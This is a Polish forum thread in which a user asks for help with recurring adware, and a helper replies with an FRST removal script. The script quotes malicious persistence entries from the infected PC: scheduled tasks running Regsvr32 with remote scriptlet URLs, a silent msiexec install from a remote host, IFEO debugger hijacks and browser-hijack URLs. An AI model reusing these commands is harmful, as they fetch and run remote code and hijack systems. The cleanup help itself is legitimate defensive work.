Elektroda.pl
Elektroda.pl
X
CControls
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

AlphaGo - wraca jak bumerang

malygonzo 12 Maj 2017 18:04 462 1
  • #1 12 Maj 2017 18:04
    malygonzo
    Poziom 2  

    Witam
    Pytanko : mam problem takim programem co się zwie AlphaGo .
    Ile razy bym go nie wywalił z systemu i tak to dziadostwo wraca przy czym dokłada mi za każdym razem do menu start + paska zadań Mozilla Firefox + Gogle Chrome ,Big Farm i Big Bank Empire ( bez mojej zgody na instalację ).
    Czyściłem śmieci CCleaner + skan SkyBotem i dalej to wraca co jest uciążliwe.

    0 1
  • CControls
  • #2 12 Maj 2017 18:29
    Kolobos
    Spec od komputerów

    Masz tez problem z poprawnym wstawianiem spacji...

    Zachcialo Ci sie Bayonett'y, to teraz masz. Na przyszlosc nie sciagaj pirackich.

    Odinstaluj: Spybot - Search & Destroy

    Zgraj zakladki z Firefox'a i odinstaluj Firefox. Pozniej mozesz zainstalowac ponownie.

    W ustawieniach Chrome wylacz przywracanie zestawu stron po starcie przegladarki.

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    CloseProcesses:
    HKU\S-1-5-21-1436099279-1903560294-535156653-1000\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== UWAGA
    Task: {049E75A8-53AF-4018-BEC4-CE19901E5FC6} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1XNUUcRkE1MYVQOWMcOWhQMThLRTzYOThSNdE2OUM4Mc== scrobj.dll
    Task: {15E8D23B-CA2C-484E-A3F3-2714A1281B3B} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2016-03-21] (Safer-Networking Ltd.)
    Task: {233A0D88-A3B0-408F-9E2E-B9DD9DC82B91} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
    Task: {30038056-7F55-4F12-9BA4-648E06FB08E5} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2016-03-21] (Safer-Networking Ltd.)
    Task: {3DED2917-8373-46B9-AD89-B64A99F6F296} - System32\Tasks\Opera scheduled Autoupdate 1468773662 => C:\Opera\launcher.exe [2017-03-21] (Opera Software)
    Task: {63FB834D-E018-4942-BD82-04E012E6A2FE} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1XNUUcRkE1MYVQOWMcOWhQMThLRTzYOThSNdE2OUM4Mc== scrobj.dll
    Task: {81737CBC-D13A-40B0-BE94-744035C91BD4} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2014-06-27] (Safer-Networking Ltd.)
    Task: {9140404B-0889-437B-ABDF-FE6C2DE1E09C} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-09] () <==== UWAGA
    Shortcut: C:\Users\Marcin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    2017-05-03 13:04 - 2017-05-03 06:29 - 00107672 _____ () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
    2017-05-04 11:34 - 2017-05-09 16:40 - 00323584 _____ () C:\Users\Marcin\AppData\Local\background_fault\bf.dll
    2017-03-01 12:18 - 2014-05-13 13:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
    2017-03-01 12:18 - 2014-05-13 13:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl




    2017-03-01 12:18 - 2014-05-13 13:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
    2017-04-17 15:35 - 2017-04-17 05:03 - 00106496 _____ () c:\programdata\software\apple\apps\notification.dll
    2017-04-17 15:35 - 2017-04-17 05:03 - 00106496 _____ () C:\ProgramData\Software\Apple\Apps\Notification.dll
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
    (Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
    () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
    Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
    HKU\S-1-5-21-1436099279-1903560294-535156653-1000\...\Run: [ALLUpdate] => C:\Program Files (x86)\ALLPlayer\ALLUpdate.exe [3670472 2015-07-28] (ALLPlayer Group Ltd.)
    HKU\S-1-5-21-1436099279-1903560294-535156653-1000\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
    HKU\S-1-5-21-1436099279-1903560294-535156653-1000\...\Run: [background_fault] => C:\Users\Marcin\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== UWAGA
    HKU\S-1-5-21-1436099279-1903560294-535156653-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1XNUUcRkE1MYVQOWMcOWhQMThLRTzYOThSNdE2OUM4Mc== /q
    HKU\S-1-5-21-1436099279-1903560294-535156653-1000\...\MountPoints2: {0b370fa0-436e-11e6-b838-08626683f856} - H:\setup.exe
    IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
    IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
    IFEO\taskmgr.exe: [Debugger]
    BootExecute: autocheck autochk * sdnclean64.exe
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...uid=WDCXWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...uid=WDCXWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...uid=WDCXWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...uid=WDCXWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
    HKU\S-1-5-21-1436099279-1903560294-535156653-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...uid=WDCXWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF
    HKU\S-1-5-21-1436099279-1903560294-535156653-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...uid=WDCXWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF
    SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...XWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF&q={searchTerms}
    SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...XWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF&q={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...XWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF&q={searchTerms}
    SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...XWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF&q={searchTerms}
    FF DefaultProfile: g2b04y8j.default
    FF ProfilePath: C:\Users\Marcin\AppData\Roaming\Firefox\Firefox\Profiles\g2b04y8j.default [2017-05-06]
    C:\Users\Marcin\AppData\Roaming\Firefox\Firefox\Profiles\g2b04y8j.default
    FF Extension: (SimilarWeb) - C:\Users\Marcin\AppData\Roaming\Firefox\Firefox\Profiles\g2b04y8j.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-05-06] [Brak podpisu cyfrowego]
    FF Extension: (HSearch) - C:\Users\Marcin\AppData\Roaming\Firefox\Firefox\Profiles\g2b04y8j.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-05-06] [Brak podpisu cyfrowego]
    FF Extension: (FF Adr) - C:\Users\Marcin\AppData\Roaming\Firefox\Firefox\Profiles\g2b04y8j.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-17] [Brak podpisu cyfrowego]
    FF Extension: (Polski Language Pack) - C:\Users\Marcin\AppData\Roaming\Firefox\Firefox\Profiles\g2b04y8j.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-05-03] [Brak podpisu cyfrowego]
    FF SearchPlugin: C:\Users\Marcin\AppData\Roaming\Firefox\Firefox\Profiles\g2b04y8j.default\searchplugins\startsearch.xml [2017-05-03]
    CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=...uid=WDCXWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF
    CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1493794987&z=7cce23eb361592c5e1ae284gaz0tcc5mbt2w1edzdb&from=ypid&uid=WDCXWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF"
    CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&...XWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> ourluckysites
    CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
    StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=...uid=WDCXWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF
    StartMenuInternet: (HKLM) Opera - C:\Program Files (x86)\Opera\Opera.exe hxxp://www.ourluckysites.com/?type=sc&ts=...uid=WDCXWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF
    StartMenuInternet: (HKLM) OperaStable - C:\Opera\Launcher.exe hxxp://www.ourluckysites.com/?type=sc&ts=...uid=WDCXWD10EZRX-00D8PB0_WD-WCC4MPU4K0NF4K0NF
    R2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [106496 2017-04-17] () [Brak podpisu cyfrowego]
    R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-09] (BIT.dll) [Brak podpisu cyfrowego]
    R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [107672 2017-05-03] () <==== UWAGA
    S2 NPASRE; C:\Users\Marcin\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
    S2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
    R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
    S2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [235984 2016-11-24] (Safer-Networking Ltd.) [Brak podpisu cyfrowego]
    R2 SNARE; C:\Users\Marcin\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
    R2 SNAREA; C:\Users\Marcin\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
    R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
    R2 WANARE; C:\Users\Marcin\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
    R2 WinSAPSvc; C:\Users\Marcin\AppData\Roaming\WinSAPSvc\WinSAP.dll [585216 2017-05-09] (serviec) [Brak podpisu cyfrowego] <==== UWAGA
    2017-05-12 16:40 - 2017-05-12 16:40 - 00000000 _____ C:\Windows\SysWOW64\3333333
    2017-05-12 16:39 - 2017-05-12 16:39 - 00000000 _____ C:\Windows\SysWOW64\00
    2017-05-11 14:25 - 2017-05-11 14:25 - 00000000 ____D C:\Users\Marcin\AppData\Local\NPASRE
    2017-05-09 16:42 - 2017-05-12 16:40 - 00000000 _____ C:\Windows\SysWOW64\1111
    2017-05-08 14:32 - 2017-05-08 14:32 - 00000000 ____D C:\Users\Public\Documents\chrome
    2017-05-05 11:48 - 2017-05-11 14:25 - 00000000 ____D C:\ProgramData\BIT
    2017-05-05 11:48 - 2017-05-05 11:48 - 00000000 ____D C:\Users\Marcin\AppData\Local\WANARE
    2017-05-04 11:34 - 2017-05-09 16:42 - 00000000 ____D C:\Users\Marcin\AppData\Local\background_fault
    2017-05-03 13:04 - 2017-05-03 13:04 - 00000000 ____D C:\Program Files (x86)\Firefox
    2017-05-03 13:03 - 2017-05-12 16:40 - 00000000 _____ C:\Windows\SysWOW64\1111111
    2017-05-03 13:03 - 2017-05-03 13:03 - 00000000 ____D C:\Users\Marcin\AppData\Local\SNAREA
    2017-04-27 19:44 - 2017-05-05 11:48 - 00003506 _____ C:\Windows\System32\Tasks\Windows-PG
    2017-04-27 19:44 - 2017-04-28 15:44 - 00000000 ____D C:\Windows\psgo
    2017-04-25 14:29 - 2017-05-12 16:40 - 00000000 _____ C:\Windows\SysWOW64\22
    2017-04-21 16:28 - 2017-05-12 16:39 - 00000000 _____ C:\Windows\SysWOW64\11
    2017-04-21 16:28 - 2017-04-27 19:44 - 00000000 _____ C:\Windows\SysWOW64\33
    2017-04-21 16:25 - 2017-05-12 16:31 - 00000000 ____D C:\Program Files\MK
    2017-04-19 14:43 - 2017-04-20 14:26 - 00000000 ____D C:\Users\Marcin\AppData\Local\3DM
    2017-04-17 19:03 - 2017-04-17 19:03 - 00000016 _____ C:\ProgramData\mntemp
    2017-04-17 15:36 - 2017-05-12 16:39 - 00002000 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2017-04-17 15:36 - 2017-05-06 02:18 - 00000000 ____D C:\Users\Marcin\AppData\LocalLow\Mozilla
    2017-04-17 15:36 - 2017-04-17 15:36 - 00000000 ____D C:\Users\Marcin\AppData\Roaming\Mozilla
    2017-04-17 15:36 - 2017-04-17 15:36 - 00000000 ____D C:\Users\Marcin\AppData\Roaming\Firefox
    2017-04-17 15:36 - 2017-04-17 15:36 - 00000000 ____D C:\Users\Marcin\AppData\Local\Firefox
    2017-04-17 15:36 - 2017-04-17 15:36 - 00000000 ____D C:\Users\Marcin\AppData\Local\Eastness
    2017-04-17 15:35 - 2017-05-12 16:43 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-04-17 15:35 - 2017-05-12 16:39 - 00000000 _____ C:\Users\Public\Documents\temp.dat
    2017-04-17 15:35 - 2017-05-12 16:31 - 00003598 _____ C:\Windows\System32\Tasks\Milimili
    2017-04-17 15:35 - 2017-05-12 16:31 - 00000000 ____D C:\Users\Marcin\AppData\Roaming\WinSAPSvc
    2017-04-17 15:35 - 2017-05-07 09:40 - 00000000 ____D C:\Users\Marcin\AppData\Local\Kitty
    2017-04-17 15:35 - 2017-04-17 15:35 - 00000000 ____D C:\ProgramData\Software
    2017-04-17 15:35 - 2017-04-17 15:35 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-17 15:35 - 2017-04-17 15:35 - 00000000 ____D C:\Program Files (x86)\Eastness
    2017-04-17 15:34 - 2017-05-03 09:03 - 00000000 ____D C:\Users\Marcin\AppData\Local\SNARE
    2017-04-17 15:30 - 2017-05-03 09:02 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-04-13 14:30 - 2017-04-13 14:30 - 00003578 _____ C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe
    2017-04-13 14:29 - 2017-04-13 14:29 - 00000000 ____D C:\Users\Marcin\AppData\Roaming\SSMgre
    2017-05-12 17:23 - 2016-07-17 18:42 - 00000000 ____D C:\Users\Marcin\Desktop\FRST-OlderVersion
    2016-08-15 01:27 - 2016-08-15 01:27 - 26640264 _____ () C:\Users\Marcin\AppData\Roaming\gameboxsetup.exe
    2017-04-17 19:03 - 2017-04-17 19:03 - 0000016 _____ () C:\ProgramData\mntemp
    EmptyTemp:

    W FRST wybierz Napraw.

    Po wykonaniu zamiesc nowe logi z FRST, ze skanowania.

    0